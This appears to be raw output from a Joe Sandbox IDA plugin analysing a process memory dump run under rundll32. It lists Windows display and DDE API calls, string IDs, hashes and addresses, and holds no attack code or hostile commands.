                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: 14801e8e4187dd84e8810d73be3efeebda3096c05967942d728a10351d33000d
                                                                      • Instruction ID: 23d148086a41ef341f7c2da157174d6bf047312b050737228224e8f244444ee8
                                                                      • Opcode Fuzzy Hash: 14801e8e4187dd84e8810d73be3efeebda3096c05967942d728a10351d33000d
                                                                      • Instruction Fuzzy Hash: DD11D671A127059FDB208F64EC487A7B7E8EF46B10F04456AFD46D7240EBB0A814CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 002985E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0029860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00298615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00298471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0029847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00298545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00298550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 002982E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 002982F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 002981C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 002981CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 002D2B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 002D2BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 002D2BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 002D2BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 002D14BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0-$`
                                                                      • API String ID: 701148680-2222062258
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00298110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%